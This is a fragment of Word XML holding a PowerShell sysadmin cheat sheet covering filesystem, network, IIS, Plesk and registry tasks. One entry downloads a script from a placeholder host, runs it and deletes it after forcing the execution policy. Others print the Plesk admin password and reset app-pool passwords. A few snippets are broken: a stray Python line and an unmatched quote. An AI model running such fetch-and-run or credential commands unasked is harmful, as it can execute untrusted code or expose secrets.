      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7AEBD0C2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4AD4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952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 | %{ echo $_ }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="27282444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4894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34ABA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956848F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364F27AB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3FC7D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A16F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Test if File Exists (-f|-d|-e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2BE05E9C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1983A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9990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test-path file.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="203A6A03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A61E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BF0C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941E6A6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04EA280D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1CAA8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8798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Time Duration of Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="659123C4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F3AA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956B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measure-command { ps | out-host }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0B5090B1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5FC42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B329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OR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3589DCF0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B94DE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AD5D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{ps | out-null}; $cmd = get-history -count 1; $cmd.endexecutiontime - $cmd.startexecutiontime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3C07438A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DC280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B5DC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6595463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322DF948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6DC59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02CA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Sleep Delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5D3CD1E4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10750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25ED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start-sleep 3; ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="44579032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D00B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1C4CD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487AF28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2235A7F9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3A6A7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D425D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8C7C0A0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328B917F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BA05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2455A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##############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="22EA24B8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97C1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A7F1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Filesystem #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5B870E07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F636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49DD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##############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="379E4CF2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1F7BC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9D54C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5786A99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0318C0AD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AB6D5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4D7D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Locate File or Directory (find)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="59EFC19E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46C7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1E3E0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gci -rec | ?{ $_ -match "[a-z]+\.[a-z]+" }  ## Where-Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="58422916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3C1E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2D69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D405678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2049DF85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F159E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D4C6E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Disk Usage / List all Drives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7FC1AB20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0B6B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DD28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gdr -psprovider 'filesystem'  ## Get-PSDrive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="133EEF74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EEC0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196B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gwmi –query "select * from win32_logicaldisk where DriveType = '3'"  ## Get-WmiObject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5A48DC79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4DF0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CD7A0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208E512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45C28E6D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EEE64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C436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Disk Usage (du)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5DA15CA1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EB46D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CA8B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 -rec C:\subdir | %{ $total += $_.length }; write-host "Total: $total";  ## SLOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0CC8ED20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B78C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49660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B09A9EF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1B08EC73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D9A0D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BABC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Process List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3F23A8A5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3A96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5D18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ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0096B386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986CD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53D8A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## OR </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0CBEEADD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1CDBC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E65AA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proc = subprocess.Popen([echo 'hello'], stdout=subprocess.PIPE, shell=True)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1AB53CF1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4CFAE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0088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(out.err) = proc.communicate()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7E7F2B13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FA36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C3C39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 out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="149F24D3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465F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8D4D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F3A8F7A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13E927C8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45C8A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EE23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Run an executable (eg. ./script.ps1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="16CB499C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7E84A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74769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&amp;$env:plesk_bin\dbclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="669D4142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39D92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0B0D9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&amp;${env:plesk_bin}\dbclient.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="561E10AA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D654E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4437D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"$env:plesk_bin\dbclient.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4F3B8549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262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E31D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"&amp;$env:plesk_bin\dbclient.exe"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="01235771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51C7C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2882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3BE2879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2B80C203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E4758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3C4C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Pass Argument Array to Executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="04FC3AC2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FBE0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9598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$arglist = @('-arg1', 'C:\path', '-arg2', 'file.txt')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6498CD79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6C61E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B5C1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&amp; 'application.exe' $arglist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5CCDBA50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F831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58F1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EEEDE29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2F3E0AA8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16CCC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7B0DE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9F8F790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535BFEFC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BA379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B4DFE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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0679487D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1F12D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E06D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Network #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="34F24285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EA9D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6936A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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7E864322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EA94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0F52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3293295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500F9B26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A7AB7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2B8FE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Network Statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5D06C4BB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FE77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F4780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netstat -oaf | ?{ $_ -notmatch "UDP" }  ## -b to show EXE </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7C703931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6127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086CD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netstat -es  ## Sent/Received/Errors + Statistics per protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7F3E19D8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EFB0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0D02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netstat -r  ## Routing table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7BC0E654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25DB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2253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DD9E8B3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3B64AC9A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11369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2766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Search the Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3EC887BE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E5482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CBA6C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(new-object -comobject hnetcfg.fwpolicy2).rules | ?{ $_.enabled -eq $true } | ?{ $_.remoteaddresses -match $ip }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1E468103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C5AF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99E0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AFF46A9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56F37CCD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00BBC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EF540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Download URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0B330ED4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7BBA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8020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(new-object system.net.webclient).downloadfile($url, $path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6B2FD5D9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CA2A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89DA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514D4AD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7EF33F1E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BE057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A42D9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Execute Remote Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2F5461B0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95C4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51B4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set-executionpolicy remotesigned -force; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7EFB53BD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4702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08D59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(new-object System.Net.WebClient).DownloadFile('https://files.hostname.com/script.ps1', 'C:\filedir\script.ps1'); </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4B430F78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873A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94FB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'C:\filedir\script.ps1';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0A81615F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5441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1E37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rm 'C:\filedir\script.ps1'; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3158C221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1320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84EEC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7A85F32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7EDD474C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C31F9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5E9F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Add DNS zones back to MSDNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="240FE7F0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5330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2AC12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 "$env:windir\System32\dns\*.dns" | %{</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="70E885B2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19AE9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0A36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$zone = $_.name -replace ".dns$", ""; echo "loading $zone..."; dnscmd /zoneadd $zone /primary /load; }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="62602470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DE61E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1C87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0846695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72B5C7C6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2D360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3D8EC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Mitigate SYN Flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="24E6669E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DE27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548CC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New-Item "HKLM:\system\currentcontrolset\services\tcpip\parameters"  ## -Force to delete first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3C336CAC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B913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DDDD2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New-ItemProperty -Path "HKLM:\system\currentcontrolset\services\tcpip\parameters" -Name 'synattackprotect' -Value 1 -PropertyType "DWORD" -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3FC1CD88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CE2D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7429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New-ItemProperty -Path "HKLM:\system\currentcontrolset\services\tcpip\parameters" -Name 'tcpmaxconnectresponseretransmissions' -Value 2 -PropertyType "DWORD" -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="48CB9EB4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6A2DE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2C48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New-ItemProperty -Path "HKLM:\system\currentcontrolset\services\tcpip\parameters" -Name 'tcpmaxdataretransmissions' -Value 3 -PropertyType "DWORD" -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="298ADEED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449DD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2816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New-ItemProperty -Path "HKLM:\system\currentcontrolset\services\tcpip\parameters" -Name 'enablepmtudiscovery' -Value 0 -PropertyType "DWORD" -Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7A72314B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6FEC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888C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86449DB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04DDC82F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A092E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ED1CD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3E35FC4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40C640AA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56EB7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552CD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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="271BEE58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B8A7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B7609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Objects #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="76DA1323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36CD9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BA9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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3CBCA3C1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D0F3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D813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CB37C83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6448A748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2E7D3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452C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Determine Object Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="51759F47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6732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DBFD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(pwd).gettype()  ## Object[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="33B896E4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C508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9BD1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(pwd|out-string).gettype()  ## String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2C4218D0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179C0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89B2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DD62B25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35D568A4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EAC64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86772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List all Object Properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="68F057B0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C288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BB1C9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ps powershell | format-list -property *</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6EED6554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0FBE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C247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CFF730B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656C03F5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53CEE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F423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List Properties of the Object Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="41B2831F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0AF0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7CEB9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ps powershell | gm  ## Get-Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0FA21971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D1619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5B51E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(ps powershell).gettype() | gm  ## same thing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4FA2FF86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6B9D9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4A3B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E09237B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1F6EE938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1895A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F1B1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Typecast - Force Type as an Array/String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6AF8DC7B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5D51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CEC0E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[string](dir)  ## String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="42909346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F3D3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C3B6C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 | out-string  ## String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6639F95B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EB3C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3C0D9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$procs = @($str)  ## Object[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5EBB975C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FFE8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5A05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A962FFC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5B8E276D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A82D4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9FA1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9AD61D0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2F6936B1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B69A5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0D21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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="344C4CFA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3F8D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D65F0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IIS #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0420556D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1F3C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2032C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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1ECFC8D5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9F10A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1008C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91ED4A0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4B532277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84A87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FEAE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Import IIS Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="768B302A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E0FD0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17D92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ipmo webadministration  ## Import-Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0392ECD7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3AB3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BABC0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648D7FE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2A5C7B79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4A51C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EF51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List all Sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7723E608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992D2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24F2A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gci IIS:\Sites | select-object name,applicationpool,physicalpath,state | format-table -autosize</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="090644BF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CB0B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39D2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8C141CD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46744227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7FCBF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80F6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List all Applicaiton Pools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="699D533B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ABA8A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34150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gci IIS:\AppPools | select-object name,managedruntimeversion,managedpipelinemode,state | format-table -autosize</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="01F31269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EEEFA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2BFE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6395EB5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366C8CE3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5F2A6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AC67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List all Application Pool users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4674B13B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5A92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6D1A0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 IIS:\apppools | select name | %{ write-host $_.name"- "$_.processmodel.username }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="71B88DDC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FF09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C8CC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8312DD8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20B460D1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71B52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FEFE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Restart an Application Pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1139E1DC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3063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2797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(get-item "IIS:\AppPools\$pool").Start()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="01316B76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A676C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E92C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CD1A19A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04EB36D2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45187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882B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Generate Application Pool password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="632D7649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2BA5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3108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Add-Type -Assembly System.Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5B2AD8BB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FC2A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B95B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$pass = [Web.Security.Membership]::GeneratePassword(16,5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="02F4AF73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95C92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1105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30C1E57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0E4DCED6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B78F6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C705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Reset Application Pool user password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7FED82A8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4A18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4FA2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net user "$identity" "$pass"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7D8405BF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A54CD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41A5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Set-ItemProperty "IIS:\AppPools\$pool" -name processModel -value @{userName="$identity";password="$pass";identitytype=3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="61CFE3E7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D77C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9162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9E503CE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49D5729E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70EAC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AE30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Show High Usage of Process (eg. w3wp.exe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6B04CCBF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AEBC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3AC4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&amp;${env:windir}\system32\inetsrv\appcmd.exe list wp | %{ $a=$_.replace('"','').split(' '); ps -id $a[1]; $a[2] }  ## Ugly format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2102C5F8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FBAFE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562A2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145E22D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08F955F7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18B0C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FF79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Add bindings to existing site</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5D0AD70C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3988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E7A6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gci IIS:\Sites | %{ $_.name } | ?{ $_ -match "[a-zA-Z0-9\.]+\.[a-zA-Z]+" } \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="47F5D5B2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8DD7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44272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| %{ $binding="*:80:webmail." + $_; \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4BFACCF2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3F60A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2B872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&amp;${env:windir}\system32\inetsrv\appcmd.exe" set site \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7EF8B75A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5507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C6B99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/site.name:"webmail(horde)" \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="376FA989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F1AE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A6EF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/+"bindings.[protocol='http',bindingInformation='$binding']" }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4587D0F6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7C24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467D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7C0ABB3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04B14609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84C88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CA4BE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958F4BA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63275763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87F2B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35B6D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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6F4D4775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0554A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5006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Plesk #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0E2F74C5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B3DC2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CDE7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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="03BB0BE2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F6582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6120D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EEF7728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3174802E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3821E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886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Show Plesk Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="39150D14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6375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68550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 $env:plesk_dir\version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="111D8510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388E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7576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5705299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1131C142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6633F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A36B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Show Available Plesk Versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="269A224F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FABFC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5C66E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&amp;$env:plesk_dir\admin\bin\ai.exe --show-all-releases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3AD52D20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2FAF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23CB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7DFABF8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3F293DD8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0EAE9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0AEA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Upgrade to Latest or Specified Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1436B698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6670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A5B8B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&amp;$env:plesk_bin\ai.exe --select-product-id panel --select-release-current --reinstall-patch --install-component base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6C37EC07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7A98E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0793D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&amp;$env:plesk_bin\dbupgrade.exe --upgrade --from-version=9.5.4 --to-version=10.4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3F66B79D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6C4B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4E01E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Repeat for every major version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="02388D78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EDE4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1EDEA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1D0CC40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7DF49D10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7DC61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E606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Retrieve/Set Plesk Admin Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="52DD4E62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A6C9E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5C25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&amp;$env:plesk_bin\plesksrvclient -get</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2B8C2612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4EA1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4F15C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&amp;$env:plesk_bin\plesksrvclient -set PASSWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="01A04038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5D9A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CA759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04CE955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2B80FDFA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C4BC1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319C8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Plesk Database (psa) Tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="03A7F5EA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C1E0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829CA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dir $env:plesk_dir\MySQL\Data\psa\*.frm | %{ $_.name.replace('.frm','') }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3FD200C1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1C91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BF18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CCD01FC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3CD418EB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3CEA4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B644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Plesk Debug Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="60B05972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CD0A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C817C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&amp;$env:plesk_dir\admin\conf\panel.ini  ## rename panel.ini.sample</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6462DDE2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45DBA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C9750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9F5C3BB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1F78A72B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7182B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70722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FF97133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0B087399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1D6FD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194DC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############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7622A3F2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7667C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37BD6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Registry #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2EB3B1BA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867A3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CA145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############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4F0888EC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6085C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B787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DF8DB78" w14:textId="77777777" w:rsidR="008850FC" w:rsidRPr="008850FC" w:rsidRDefault="008850FC" w:rsidP="008850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0FC" w:rsidRPr="008850FC" w14:paraId="0E04504D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9A92B" w14:textId="77777777" w:rsidR="008850FC" w:rsidRPr="008850FC" w:rsidRDefault="008850FC" w:rsidP="008850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B8B84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Add New Registry Entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7A768202" w14:textId="77777777" w:rsidTr="008850F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94B80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249CF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New-Item "HKLM:\SYSTEM\CurrentControlSet\XYZ"  ## -Force to delete/recreate folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3A699AAA" w14:textId="77777777" w:rsidTr="008850F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671A7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2CEF1" w14:textId="77777777" w:rsidR="008850FC" w:rsidRPr="008850FC" w:rsidRDefault="008850FC" w:rsidP="008850F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50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New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\XYZ" -Name Enabled -Value 0 -PropertyType "DWORD" -Force </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
